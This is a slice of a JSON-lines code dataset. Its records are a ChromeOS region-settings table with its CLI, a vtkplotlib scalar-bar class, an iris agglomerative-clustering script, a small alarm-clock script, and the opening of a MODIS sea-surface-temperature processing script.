['Asia/Samarkand', 'Asia/Tashkent'],\n ['uz', 'ru', 'tg'], KML.ANSI, 'Uzbekistan'),\n Region(\n 'mm', 'xkb:mm::mya', 'Asia/Rangoon', 'my', KML.ANSI, 'Myanmar',\n None),\n Region(\n 'ml', 'xkb:ml::fra', 'Africa/Bamako', ['fr-ML', 'bm'], KML.ANSI,\n 'Mali'),\n Region(\n 'mo', 'xkb:mo::zho', 'Asia/Macau', ['zh', 'zh-MO', 'pt'], KML.ANSI,\n 'Macao'),\n Region(\n 'mn', 'xkb:mn::mon', ['Asia/Ulaanbaatar', 'Asia/Hovd',\n 'Asia/Choibalsan'], ['mn', 'ru'], KML.ANSI,\n 'Mongolia'),\n Region(\n 'mh', 'xkb:mh::mah', ['Pacific/Majuro'], ['mh' 'en-MH'], KML.ANSI,\n 'Marshall Islands'),\n Region(\n 'mk', 'xkb:mk::mkd', 'Europe/Skopje', ['mk', 'sq', 'tr'], KML.ANSI,\n 'Macedonia'),\n Region(\n 'mu', 'xkb:mu::eng', 'Indian/Mauritius', ['en-MU', 'bho'], KML.ANSI,\n 'Mauritius'),\n Region(\n 'mt', ['xkb:us::eng'], 'Europe/Malta', ['mt', 'en-GB'], KML.ISO,\n 'Malta'),\n Region(\n 'mw', 'xkb:mw::nya', 'Africa/Blantyre', ['ny', 'yao', 'tum'], KML.ANSI,\n 'Malawi'),\n Region(\n 'mv', 'xkb:mv::div', 'Indian/Maldives', ['dv', 'en'], KML.ANSI,\n 'Maldives'),\n Region(\n 'mq', 'xkb:mq::fra', 'America/Martinique', 'fr-MQ', KML.ANSI,\n 'Martinique'),\n Region(\n 'mp', 'xkb:us::eng', 'Pacific/Saipan', ['fil', 'tl', 'zh', 'ch-MP',\n 'en-MP'], KML.ANSI,\n 'Northern Mariana Islands'),\n Region(\n 'ms', 'xkb:ms::eng', 'America/Montserrat', 'en-MS', KML.ANSI,\n 'Montserrat'),\n Region(\n 'mr', 'xkb:mr::ara', 'Africa/Nouakchott', ['ar', 'fuc', 'snk', 'fr',\n 'mey', 'wo'], KML.ANSI,\n 'Mauritania'),\n Region(\n 'im', 'xkb:im::eng', 'Europe/Isle_of_Man', ['en', 'gv'], KML.ANSI,\n 'Isle of Man'),\n Region(\n 'ug', 'xkb:ug::eng', 'Africa/Kampala', ['en-UG', 'lg', 'ar'], KML.ANSI,\n 'Uganda'),\n Region(\n 'tz', 'xkb:tz::swa', 'Africa/Dar_es_Salaam', ['sw-TZ', 'en'], KML.ANSI,\n 'Tanzania'),\n Region(\n 'io', 'xkb:io::eng', 'Indian/Chagos', 'en-IO', KML.ANSI,\n 'British Indian Ocean Territory'),\n Region(\n 'sh', 'xkb:sh::eng', 'Atlantic/St_Helena', 'en-SH', KML.ANSI,\n 'Saint Helena'),\n Region(\n 'fj', 'xkb:fj::eng', 'Pacific/Fiji', ['en-FJ', 'fj'], KML.ANSI,\n 'Fiji'),\n Region(\n 'fk', 'xkb:fk::eng', 'Atlantic/Stanley', 'en-FK', KML.ANSI,\n 'Falkland Islands'),\n Region(\n 'fm', 'xkb:fm::eng', [\n 'Pacific/Chuuk', 'Pacific/Pohnpei', 'Pacific/Kosrae'], [\n 'en-FM', 'chk', 'pon', 'yap', 'kos', 'uli', 'woe', 'nkr',\n 'kpg'], KML.ANSI,\n 'Micronesia'),\n Region(\n 'fo', 'xkb:fo::fao', 'Atlantic/Faroe', ['fo', 'da-FO'], KML.ANSI,\n 'Faroe Islands'),\n Region(\n 'ni', 'xkb:latam::spa', 'America/Managua', ['es-419', 'en'], KML.ANSI,\n 'Nicaragua'),\n Region(\n 'no', 'xkb:no::nor', 'Europe/Oslo', ['no', 'nb', 'nn', 'se'], KML.ISO,\n 'Norway'),\n Region(\n 'na', 'xkb:na::eng', 'Africa/Windhoek', ['en-NA', 'af', 'de', 'hz',\n 'naq'], KML.ANSI,\n 'Namibia'),\n Region(\n 'vu', 'xkb:vu::bis', 'Pacific/Efate', ['bi', 'en-VU'], KML.ANSI,\n 'Vanuatu'),\n Region(\n 'nc', 'xkb:nc::fra', 'Pacific/Noumea', 'fr-NC', KML.ANSI,\n 'New Caledonia'),\n Region(\n 'ne', 'xkb:ne::fra', 'Africa/Niamey', ['fr-NE', 'ha', 'kr'], KML.ANSI,\n 'Niger'),\n Region(\n 'nf', 'xkb:nf::eng', 'Pacific/Norfolk', 'en-NF', KML.ANSI,\n 'Norfolk Island'),\n Region(\n 'np', 'xkb:np::nep', 'Asia/Kathmandu', ['ne', 'en'], KML.ANSI,\n 'Nepal'),\n Region(\n 'nr', 'xkb:nr::nau', 'Pacific/Nauru', ['na', 'en-NR'], KML.ANSI,\n 'Nauru'),\n Region(\n 'nu', 'xkb:us::eng', 'Pacific/Niue', ['niu', 'en-NU'], KML.ANSI,\n 'Niue'),\n Region(\n 'ck', 'xkb:ck::eng', 'Pacific/Rarotonga', ['en-CK', 'mi'], KML.ANSI,\n 'Cook Islands'),\n Region(\n 'ci', 'xkb:ci::fra', 'Africa/Abidjan', 'fr-CI', KML.ANSI,\n 'Ivory Coast'),\n Region(\n 'cn', 'xkb:us::eng', 'Asia/Shanghai', 'zh-CN', KML.ANSI,\n 'China'),\n Region(\n 'cm', 'xkb:cm::eng', 'Africa/Douala', ['en-CM', 'fr-CM'], KML.ANSI,\n 'Cameroon'),\n Region(\n 'cc', 'xkb:cc::msa', 'Indian/Cocos', ['ms-CC', 'en'], KML.ANSI,\n 'Cocos Islands'),\n Region(\n 'cg', 'xkb:cg::fra', 'Africa/Brazzaville', ['fr-CG', 'kg'], KML.ANSI,\n 'Republic of the Congo'),\n Region(\n 'cf', 'xkb:cf::fra', 'Africa/Bangui', ['fr-CF', 'sg', 'ln'], KML.ANSI,\n 'Central African Republic'),\n Region(\n 'cd', 'xkb:cd::fra', ['Africa/Kinshasa', 'Africa/Lubumbashi'], [\n 'fr-CD', 'ln', 'kg'], KML.ANSI,\n 'Democratic Republic of the Congo'),\n Region(\n 'cy', 'xkb:cy::ell', 'Asia/Nicosia', ['el-CY', 'tr-CY'], KML.ANSI,\n 'Cyprus'),\n Region(\n 'cx', 'xkb:cx::eng', 'Indian/Christmas', ['en', 'zh'], KML.ANSI,\n 'Christmas Island'),\n Region(\n 'cr', 'xkb:latam::spa', 'America/Costa_Rica', ['es-419'], KML.ANSI,\n 'Costa Rica'),\n Region(\n 'cw', 'xkb:cw::nld', 'America/Curacao', ['nl'], KML.ANSI, 'Curacao'),\n Region(\n 'cv', 'xkb:cv::por', 'Atlantic/Cape_Verde', 'pt-CV', KML.ANSI,\n 'Cape Verde'),\n Region(\n 'cu', 'xkb:latam::spa', 'America/Havana', 'es-419', KML.ANSI,\n 'Cuba'),\n Region(\n 'sz', 'xkb:sz::eng', 'Africa/Mbabane', ['en-SZ', 'ss-SZ'], KML.ANSI,\n 'Swaziland'),\n Region(\n 'sy', 'xkb:sy::ara', 'Asia/Damascus', ['ar', 'ku', 'hy', 'arc', 'fr',\n 'en'], KML.ANSI,\n 'Syria'),\n Region(\n 'sx', 'xkb:sx::nld', 'America/Lower_Princes', ['nl', 'en'], KML.ANSI,\n 'Sint Maarten'),\n Region(\n 'kg', 'xkb:kg::kir', 'Asia/Bishkek', ['ky', 'uz', 'ru'], KML.ANSI,\n 'Kyrgyzstan'),\n Region(\n 'ke', 'xkb:ke::eng', 'Africa/Nairobi', ['en-KE', 'sw-KE'], KML.ANSI,\n 'Kenya'),\n Region(\n 'ss', 'xkb:ss::eng', 'Africa/Juba', 'en', KML.ANSI,\n 'South Sudan'),\n Region(\n 'sr', 'xkb:sr::nld', 'America/Paramaribo', ['nl-SR', 'en', 'srn', 'hns',\n 'jv'], KML.ANSI,\n 'Suriname'),\n Region(\n 'ki', 'xkb:ki::eng', ['Pacific/Tarawa', 'Pacific/Enderbury',\n 'Pacific/Kiritimati'], ['en-KI', 'gil'], KML.ANSI,\n 'Kiribati'),\n Region(\n 'kh', 'xkb:kh::khm', 'Asia/Phnom_Penh', ['km', 'fr', 'en'], KML.ANSI,\n 'Cambodia'),\n Region(\n 'kn', 'xkb:kn::eng', 'America/St_Kitts', 'en-KN', KML.ANSI,\n 'Saint Kitts and Nevis'),\n Region(\n 'km', 'xkb:km::ara', 'Indian/Comoro', ['ar', 'fr-KM'], KML.ANSI,\n 'Comoros'),\n Region(\n 'st', 'xkb:st::por', 'Africa/Sao_Tome', 'pt-ST', KML.ANSI,\n 'Sao Tome and Principe'),\n Region(\n 'si', 'xkb:si::slv', 'Europe/Ljubljana', ['sl', 'hu', 'it', 'sr', 'de',\n 'hr', 'en-GB'], KML.ISO,\n 'Slovenia'),\n Region(\n 'kp', 'xkb:kp::kor', 'Asia/Pyongyang', 'ko-KP', KML.ANSI,\n 'North Korea'),\n Region(\n 'sn', 'xkb:sn::fra', 'Africa/Dakar', ['fr-SN', 'wo', 'fuc'], KML.ANSI,\n 'Senegal'),\n Region(\n 'sm', 'xkb:sm::ita', 'Europe/San_Marino', 'it-SM', KML.ANSI,\n 'San Marino'),\n Region(\n 'sl', 'xkb:sl::eng', 'Africa/Freetown', ['en-SL', 'men'], KML.ANSI,\n 'Sierra Leone'),\n Region(\n 'sc', 'xkb:sc::eng', 'Indian/Mahe', ['en-SC', 'fr-SC'], KML.ANSI,\n 'Seychelles'),\n Region(\n 'kz', 'xkb:kz::kaz', ['Asia/Almaty', 'Asia/Qyzylorda', 'Asia/Aqtobe',\n 'Asia/Aqtau'], ['kk', 'ru'], KML.ANSI,\n 'Kazakhstan'),\n Region(\n 'ky', 'xkb:ky::eng', 'America/Cayman', 'en-KY', KML.ANSI,\n 'Cayman Islands'),\n Region(\n 'sd', 'xkb:sd::ara', 'Africa/Khartoum', ['ar', 'en', 'fia'], KML.ANSI,\n 'Sudan'),\n Region(\n 'do', 'xkb:latam::spa', 'America/Santo_Domingo', 'es-419', KML.ANSI,\n 'Dominican Republic'),\n Region(\n 'dm', 'xkb:dm::eng', 'America/Dominica', 'en-DM', KML.ANSI,\n 'Dominica'),\n Region(\n 'dj', 'xkb:dj::fra', 'Africa/Djibouti', ['fr-DJ', 'ar'], KML.ANSI,\n 'Djibouti'),\n Region(\n 'dk', 'xkb:dk::dan', 'Europe/Copenhagen', ['da-DK', 'en', 'fo',\n 'de-DK'], KML.ISO,\n 'Denmark'),\n Region(\n 'vg', 'xkb:vg::eng', 'America/Tortola', 'en-VG', KML.ANSI,\n 'British Virgin Islands'),\n Region(\n 'ye', 'xkb:ye::ara', 'Asia/Aden', 'ar', KML.ANSI,\n 'Yemen'),\n Region(\n 'dz', 'xkb:dz::ara', 'Africa/Algiers', 'ar', KML.ANSI,\n 'Algeria'),\n Region(\n 'yt', 'xkb:yt::fra', 'Indian/Mayotte', 'fr-YT', KML.ANSI,\n 'Mayotte'),\n Region(\n 'um', 'xkb:um::eng', ['Pacific/Johnston', 'Pacific/Midway',\n 'Pacific/Wake'], 'en-UM', KML.ANSI,\n 'United States Minor Outlying Islands'),\n Region(\n 'lb', 'xkb:lb::ara', 'Asia/Beirut', ['ar', 'fr-LB', 'en'], KML.ANSI,\n 'Lebanon'),\n Region(\n 'lc', 'xkb:lc::eng', 'America/St_Lucia', 'en-LC', KML.ANSI,\n 'Saint Lucia'),\n Region(\n 'la', 'xkb:la::lao', 'Asia/Vientiane', ['lo', 'fr', 'en'], KML.ANSI,\n 'Laos'),\n Region(\n 'tv', 'xkb:us::eng', 'Pacific/Funafuti', ['tvl', 'en', 'sm'], KML.ANSI,\n 'Tuvalu'),\n Region(\n 'tt', 'xkb:tt::eng', 'America/Port_of_Spain', ['en-TT', 'hns', 'fr',\n 'es', 'zh'], KML.ANSI,\n 'Trinidad and Tobago'),\n Region(\n 'lk', 'xkb:lk::sin', 'Asia/Colombo', ['si', 'ta', 'en'], KML.ANSI,\n 'Sri Lanka'),\n Region(\n 'li', 'xkb:ch::ger', 'Europe/Vaduz', ['de', 'en-GB'], KML.ISO,\n 'Liechtenstein'),\n Region(\n 'lv', 'xkb:lv:apostrophe:lav', 'Europe/Riga', ['lv', 'lt', 'ru',\n 'en-GB'], KML.ISO,\n 'Latvia'),\n Region(\n 'to', 'xkb:to::ton', 'Pacific/Tongatapu', ['to', 'en-TO'], KML.ANSI,\n 'Tonga'),\n Region(\n 'lt', 'xkb:lt::lit', 'Europe/Vilnius', ['lt', 'ru', 'pl'], KML.ISO,\n 'Lithuania'),\n Region(\n 'lu', 'xkb:lu::ltz', 'Europe/Luxembourg', ['lb', 'de-LU'], KML.ANSI,\n 'Luxembourg'),\n Region(\n 'lr', 'xkb:lr::eng', 'Africa/Monrovia', 'en-LR', KML.ANSI,\n 'Liberia'),\n Region(\n 'ls', 'xkb:ls::eng', 'Africa/Maseru', ['en-LS', 'st', 'zu'], KML.ANSI,\n 'Lesotho'),\n Region(\n 'tf', 'xkb:tf::fra', 'Indian/Kerguelen', 'fr', KML.ANSI,\n 'French Southern Territories'),\n Region(\n 'tg', 'xkb:tg::fra', 'Africa/Lome', ['fr-TG', 'ee', 'hna'], KML.ANSI,\n 'Togo'),\n Region(\n 'td', 'xkb:td::fra', 'Africa/Ndjamena', ['fr-TD', 'ar'], KML.ANSI,\n 'Chad'),\n Region(\n 'tc', 'xkb:tc::eng', 'America/Grand_Turk', 'en-TC', KML.ANSI,\n 'Turks and Caicos Islands'),\n Region(\n 'ly', 'xkb:ly::ara', 'Africa/Tripoli', ['ar', 'it', 'en'], KML.ANSI,\n 'Libya'),\n Region(\n 'va', 'xkb:va::lat', 'Europe/Vatican', ['la', 'it', 'fr'], KML.ANSI,\n 'Vatican'),\n Region(\n 'vc', 'xkb:vc::eng', 'America/St_Vincent', ['en-VC', 'fr'], KML.ANSI,\n 'Saint Vincent and the Grenadines'),\n Region(\n 'ad', 'xkb:ad::cat', 'Europe/Andorra', 'ca', KML.ANSI,\n 'Andorra'),\n Region(\n 'ag', 'xkb:ag::eng', 'America/Antigua', 'en-AG', KML.ANSI,\n 'Antigua and Barbuda'),\n Region(\n 'af', 'xkb:af::fas', 'Asia/Kabul', ['fa-AF', 'ps'], KML.ANSI,\n 'Afghanistan'),\n Region(\n 'ai', 'xkb:ai::eng', 'America/Anguilla', 'en-AI', KML.ANSI,\n 'Anguilla'),\n Region(\n 'vi', 'xkb:vi::eng', 'America/St_Thomas', 'en-VI', KML.ANSI,\n 'U.S. Virgin Islands'),\n Region(\n 'ir', 'xkb:ir::fas', 'Asia/Tehran', ['fa-IR', 'ku'], KML.ANSI,\n 'Iran'),\n Region(\n 'am', 'xkb:am::hye', 'Asia/Yerevan', 'hy', KML.ANSI,\n 'Armenia'),\n Region(\n 'al', 'xkb:al::sqi', 'Europe/Tirane', ['sq', 'el'], KML.ANSI,\n 'Albania'),\n Region(\n 'ao', 'xkb:ao::por', 'Africa/Luanda', 'pt-AO', KML.ANSI,\n 'Angola'),\n Region(\n 'as', 'xkb:as::eng', 'Pacific/Pago_Pago', ['en-AS', 'sm'], KML.ANSI,\n 'American Samoa'),\n Region(\n 'aw', 'xkb:aw::nld', 'America/Aruba', ['nl-AW', 'es', 'en'], KML.ANSI,\n 'Aruba'),\n Region(\n 'ax', 'xkb:ax::swe', 'Europe/Mariehamn', 'sv-AX', KML.ANSI,\n 'Aland Islands'),\n Region(\n 'az', 'xkb:az::aze', 'Asia/Baku', ['az', 'ru', 'hy'], KML.ANSI,\n 'Azerbaijan'),\n Region(\n 'ua', 'xkb:ua::ukr', [\n 'Europe/Kiev', 'Europe/Uzhgorod', 'Europe/Zaporozhye'], [\n 'uk', 'ru-UA', 'rom', 'pl', 'hu'], KML.ANSI,\n 'Ukraine'),\n Region(\n 'qa', 'xkb:qa::ara', 'Asia/Bahrain', ['ar', 'en'], KML.ANSI,\n 'Qatar'),\n Region(\n 'mz', 'xkb:mz::por', 'Africa/Maputo', ['pt-MZ', 'vmw'], KML.ANSI,\n 'Mozambique'),\n ]\n\"\"\"A list of :py:class:`regions.Region` objects for\n**unconfirmed** regions. These may contain incorrect information (or not\nsupported by Chrome browser yet), and all fields must be reviewed before launch.\nSee http://goto/vpdsettings.\n\nCurrently, non-Latin keyboards must use an underlying Latin keyboard\nfor VPD. (This assumption should be revisited when moving items to\n:py:data:`regions.Region.REGIONS_LIST`.) This is\ncurrently being discussed on .\n\nSome timezones or locales may be missing from ``timezone_settings.cc`` (see\nhttp://crosbug.com/p/23902). This must be rectified before moving\nitems to :py:data:`regions.Region.REGIONS_LIST`.\n\"\"\"\n\n\ndef ConsolidateRegions(regions):\n \"\"\"Consolidates a list of regions into a dict.\n\n Args:\n regions: A list of Region objects. All objects for any given\n region code must be identical or we will throw an exception.\n (We allow duplicates in case identical region objects are\n defined in both regions.py and the overlay, e.g., when moving\n items to the public overlay.)\n\n Returns:\n A dict from region code to Region.\n\n Raises:\n RegionException: If there are multiple regions defined for a given\n region, and the values for those regions differ.\n \"\"\"\n # Build a dict from region_code to the first Region with that code.\n region_dict = {}\n for r in regions:\n existing_region = region_dict.get(r.region_code)\n if existing_region:\n if existing_region.GetFieldsDict() != r.GetFieldsDict():\n raise RegionException(\n 'Conflicting definitions for region %r: %r, %r' %\n (r.region_code, existing_region.GetFieldsDict(),\n r.GetFieldsDict()))\n else:\n region_dict[r.region_code] = r\n\n return region_dict\n\n\ndef BuildRegionsDict(include_all=False):\n \"\"\"Builds a dictionary mapping from code to :py:class:`regions.Region` object.\n\n The regions include:\n\n * :py:data:`regions.REGIONS_LIST`\n * :py:data:`regions_overlay.REGIONS_LIST`\n * Only if ``include_all`` is true:\n\n * :py:data:`regions.UNCONFIRMED_REGIONS_LIST`\n * :py:data:`regions.INCOMPLETE_REGIONS_LIST`\n\n A region may only appear in one of the above lists, or this function\n will (deliberately) fail.\n \"\"\"\n regions = list(REGIONS_LIST)\n if include_all:\n known_codes = [r.region_code for r in regions]\n regions += [r for r in UNCONFIRMED_REGIONS_LIST if r.region_code not in\n known_codes]\n\n # Build dictionary of region code to list of regions with that\n # region code. Check manually for duplicates, since the region may\n # be present both in the overlay and the public repo.\n return ConsolidateRegions(regions)\n\n\nREGIONS = BuildRegionsDict()\n\n\ndef main(args=sys.argv[1:], out=None):\n parser = argparse.ArgumentParser(description=(\n 'Display all known regions and their parameters. '))\n parser.add_argument('--format',\n choices=('human-readable', 'csv', 'json', 'yaml'),\n default='human-readable',\n help='Output format (default=%(default)s)')\n parser.add_argument('--all', action='store_true',\n help='Include unconfirmed and incomplete regions')\n parser.add_argument('--notes', action='store_true',\n help='Include notes in output')\n parser.add_argument('--output', default=None,\n help='Specify output file')\n parser.add_argument('--overlay', default=None,\n help='Specify a Python file to overlay extra data')\n args = parser.parse_args(args)\n\n if args.overlay is not None:\n execfile(args.overlay)\n\n if args.all:\n # Add an additional 'confirmed' property to help identifying region status,\n # for autotests, unit tests and factory module.\n Region.FIELDS.insert(1, 'confirmed')\n for r in REGIONS_LIST:\n r.confirmed = True\n for r in UNCONFIRMED_REGIONS_LIST:\n r.confirmed = False\n\n regions_dict = BuildRegionsDict(args.all)\n\n if out is None:\n if args.output is None:\n out = sys.stdout\n else:\n out = open(args.output, 'w')\n\n if args.notes or args.format == 'csv':\n Region.FIELDS += ['notes']\n\n # Handle YAML and JSON output.\n if args.format == 'yaml' or args.format == 'json':\n data = {}\n for region in regions_dict.values():\n item = {}\n for field in Region.FIELDS:\n item[field] = getattr(region, field)\n data[region.region_code] = item\n if args.format == 'yaml':\n yaml.dump(data, out)\n else:\n json.dump(data, out)\n return\n\n # Handle CSV or plain-text output: build a list of lines to print.\n lines = [Region.FIELDS]\n\n def CoerceToString(value):\n \"\"\"Returns the arguments in simple string type.\n\n If value is a list, concatenate its values with commas. Otherwise, just\n return value.\n \"\"\"\n if isinstance(value, list):\n return ','.join(value)\n else:\n return str(value)\n\n for region in sorted(regions_dict.values(), key=lambda v: v.region_code):\n lines.append([CoerceToString(getattr(region, field))\n for field in Region.FIELDS])\n\n if args.format == 'csv':\n # Just print the lines in CSV format. Note the values may include ',' so the\n # separator must be tab.\n for l in lines:\n print('\\t'.join(l))\n elif args.format == 'human-readable':\n num_columns = len(lines[0])\n\n # Calculate maximum length of each column.\n max_lengths = []\n for column_no in xrange(num_columns):\n max_lengths.append(max(len(line[column_no]) for line in lines))\n\n # Print each line, padding as necessary to the max column length.\n for line in lines:\n for column_no in xrange(num_columns):\n out.write(line[column_no].ljust(max_lengths[column_no] + 2))\n out.write('\\n')\n else:\n sys.exit('Sorry, unknown format specified: %s' % args.format)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"regions/regions.py","file_name":"regions.py","file_ext":"py","file_size_in_byte":47876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"129732888","text":"# -*- coding: utf-8 -*-\r\n# =============================================================================\r\n# Created on Sun Jul 21 15:29:19 2019\r\n#\r\n# @author: Brénainn Woodsend\r\n#\r\n#\r\n# ScalarBar.py adds a scalar/color bar.\r\n# Copyright (C) 2019 Brénainn Woodsend\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n# =============================================================================\r\n\r\nfrom builtins import super\r\n\r\nimport vtk\r\nimport numpy as np\r\n\r\nfrom vtkplotlib.plots.BasePlot import Actor2Base\r\n\r\n\r\n\r\nclass ScalarBar(Actor2Base):\r\n \"\"\"Create a scalar bar. Also goes by the alias `colorbar`.\r\n\r\n :param plot: The plot with scalars to draw a scalarbar for.\r\n\r\n :param title: , defaults to ''.\r\n :type title: str, optional\r\n\r\n :param fig: The figure to plot into, can be None, defaults to vpl.gcf().\r\n :type fig: vpl.figure, vpl.QtFigure, optional\r\n\r\n\r\n :return: The scalarbar object.\r\n :rtype: vtkplotlib.plots.ScalarBar.ScalarBar\r\n\r\n\r\n The `plot` argument can be the output of any ``vpl.***`` command that takes\r\n `scalars` as an argument.\r\n\r\n \"\"\"\r\n def __init__(self, plot, title=\"\", fig=\"gcf\"):\r\n\r\n super().__init__(fig)\r\n\r\n self.actor = vtk.vtkScalarBarActor()\r\n self.actor.SetTitle(title)\r\n\r\n self.actor.SetNumberOfLabels(6)\r\n\r\n self.__actor2d_init__()\r\n\r\n self.lookup_table = plot.mapper.GetLookupTable()\r\n if self.lookup_table.GetTable().GetNumberOfTuples() == 0:\r\n # ForceBuild resets it as well as building it. Thus overwriting any\r\n # existing colormap. Only build if it has not already been built.\r\n self.lookup_table.ForceBuild()\r\n self.actor.SetLookupTable(self.lookup_table)\r\n\r\n\r\n# self.fig += self\r\n self.fig.renderer.AddActor2D(self.actor)\r\n self.fig.plots.add(self)\r\n\r\n self.set_horizontal = self.actor.SetOrientationToHorizontal\r\n self.set_vertical = self.actor.SetOrientationToVertical\r\n\r\n\r\n\r\n\r\ndef test():\r\n from stl.mesh import Mesh\r\n import vtkplotlib as vpl\r\n\r\n mesh = Mesh.from_file(vpl.data.get_rabbit_stl())\r\n plot = vpl.mesh_plot(mesh, scalars=mesh.x)\r\n\r\n self = vpl.scalar_bar(plot, \"X Values\")\r\n\r\n vpl.show()\r\n\r\n globals().update(locals())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n test()\r\n\r\n","sub_path":"venv/lib/python3.7/site-packages/vtkplotlib/plots/ScalarBar.py","file_name":"ScalarBar.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"640993015","text":"import numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn import datasets\nfrom matplotlib import pyplot as Plot\nimport time\n\nnp.random.seed(5)\n\niris = datasets.load_iris()\nX = iris.data\ny = iris.target\n\nno_of_clusters = 3\n\nstart_time = time.time()\nagglomerative_clustering = AgglomerativeClustering(n_clusters=no_of_clusters, linkage='average').fit(X)\nend_time = time.time()\n\nfinal_labels = agglomerative_clustering.labels_\n\n# PLOTTING THE KMEANS 3D PLOT\n\nPlot.figure(1, figsize=(14, 12))\nPlot.clf()\ncolor_map = Plot.cm.get_cmap('RdYlBu')\nspecies = ['Setosa','Versicolor','Virginica']\nformatter = Plot.FuncFormatter(lambda i, *args: species[i])\n\nfig2 = Plot.figure(1, figsize=(14, 12))\nax = Axes3D(fig2, elev=-165, azim=5)\nax.scatter(X[:, 1], X[:, 2], X[:, 3], c=final_labels, cmap=color_map, edgecolor='k', s=40)\nax.set_title(\"Agglomerative Clustering\")\nax.set_xlabel(\"Sepal Width\")\nax.w_xaxis.set_ticklabels([])\nax.set_ylabel(\"Petal Length\")\nax.w_yaxis.set_ticklabels([])\nax.set_zlabel(\"Petal Width\")\nax.w_zaxis.set_ticklabels([])\nPlot.show()\n\nag_centroid = [[np.zeros(4),0],[np.zeros(4),0],[np.zeros(4),0]]\n\nfor i in range(len(final_labels)) :\n ag_centroid[final_labels[i]][0] = ag_centroid[final_labels[i]][0] + np.array(X[i])\n ag_centroid[final_labels[i]][1] += 1\n\niris_centroid = [[np.zeros(4),0],[np.zeros(4),0],[np.zeros(4),0]]\n\nfor i in range(len(y)) :\n iris_centroid[y[i]][0] = iris_centroid[y[i]][0] + np.array(X[i])\n iris_centroid[y[i]][1] += 1\n\noriginal_centroids = [(i[0]/i[1]) for i in iris_centroid]\nagglomerative_centroids = [(i[0]/i[1]) for i in ag_centroid]\nag_to_original = {0:None, 1:None, 2:None}\n\nfor i in range(len(agglomerative_centroids)) :\n minimum = [None,10000000]\n for j in range(len(original_centroids)) :\n temp = np.linalg.norm(agglomerative_centroids[i]-np.array(original_centroids[j]))\n if temp < minimum[1] :\n minimum[1] = temp\n minimum[0] = j\n ag_to_original[i] = minimum[0]\n\nerror_agg = 0\nfor i in range(len(final_labels)) :\n if y[i] != ag_to_original[final_labels[i]] :\n error_agg += 1\nerror_agg = error_agg*100/len(y)\n\nprint(\"Time to execute Agglomerative Clustering Algorithm :\",end_time - start_time)\nprint(\"Error in Marking Correct via Agglomerative Clustering is\",error_agg,\"%\")\n","sub_path":"Project 2 (EDA & Unsupervised Learning)/Code_and_Plots/agglomerativeClusteringScikit.py","file_name":"agglomerativeClusteringScikit.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"395934145","text":"import datetime\r\nimport winsound\r\nalarm_hour = int(input(\"What hour do you want ot wake up?\"))\r\nalarm_minute = int(input(\"What minute do you want ot wake up?\"))\r\nam_pm = str(input(\"pm or am?\"))\r\n\r\nif am_pm == \"pm\":\r\n alarm_hour = alarm_hour + 12\r\n\r\nwhile True:\r\n if alarm_hour == datetime.datetime.now().hour and alarm_minute == datetime.datetime.now().minute:\r\n print(\"Wake up\")\r\n winsound.PlaySound(\"Music\", winsound.SND_FILENAME)\r\n break\r\nprint(\"exit\")\r\n","sub_path":"Alarm.py","file_name":"Alarm.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"510978608","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nCreated on Wed Oct 21 14:38:31 2020\n@author: guitar79\ncreated by Kevin\n#Open hdf file\nNameError: name 'SD' is not defined\nconda install -c conda-forge pyhdf\n\nrunfile('./classify_MODIS_hdf_MP-01.py', 'daily 2011', wdir='./KOSC_MODIS_SST_Python/')\n\nlen(npy_data[795,183])\nnp.mean(npy_data[795,183])\n\nhdf_data = np.load(f_name1, allow_pickle=True)\n\n'''\n\nfrom glob import glob\nfrom datetime import datetime\nimport numpy as np\nimport os\nimport sys\nfrom sys import argv\nimport _MODIS_AOD_utilities\n\n#script, L3_perid, yr = argv # Input L3_perid : 'weekly' 'monthly' 'daily'\nprint(\"argv: {}\".format(argv))\nif len(argv) < 3 :\n print (\"len(argv) < 2\\nPlease input L3_perid and year \\n ex) aaa.py daily 2016\\n ex) aaa.py weekly 2016\\n ex) aaa.py monthly 2016\")\n sys.exit()\nelif len(argv) > 3 :\n print (\"len(argv) > 2\\nPlease input L3_perid and year \\n ex) aaa.py daily 2016\\n ex) aaa.py weekly 2016\\n ex) aaa.py monthly 2016\")\n sys.exit()\nelif argv[1] == 'daily' or argv[1] == 'weekly' or argv[1] == 'monthly' :\n L3_perid, yr = argv[1], int(argv[2])\n print(\"{}, {} processing started...\".format(argv[1], argv[2]))\nelse :\n print(\"Please input L3_perid and year \\n ex) aaa.py daily 2016\\n ex) aaa.py weekly 2016\\n ex) aaa.py monthly 2016\")\n sys.exit()\n#L3_perid, yr = \"daily\", 2019\nadd_log = True\nif add_log == True :\n log_file = 'MODIS_SST_python.log'\n err_log_file = 'MODIS_SST_python.log'\n \nDATAFIELD_NAME = \"sst\"\n#Set lon, lat, resolution\nLlon, Rlon = 110, 150\nSlat, Nlat = 10, 60\nresolution = 0.1\nbase_dir_name = '../MODIS_L2_SST/'\nsave_dir_name = \"../{0}_L3/{0}_{1}_{2}_{3}_{4}_{5}_{6}/\".format(DATAFIELD_NAME, str(Llon), str(Rlon),\n str(Slat), str(Nlat), str(resolution), L3_perid)\nif not os.path.exists(save_dir_name):\n os.makedirs(save_dir_name)\n print ('*'*80)\n print (save_dir_name, 'is created')\nelse :\n print ('*'*80)\n print (save_dir_name, 'is exist')\n\nyears 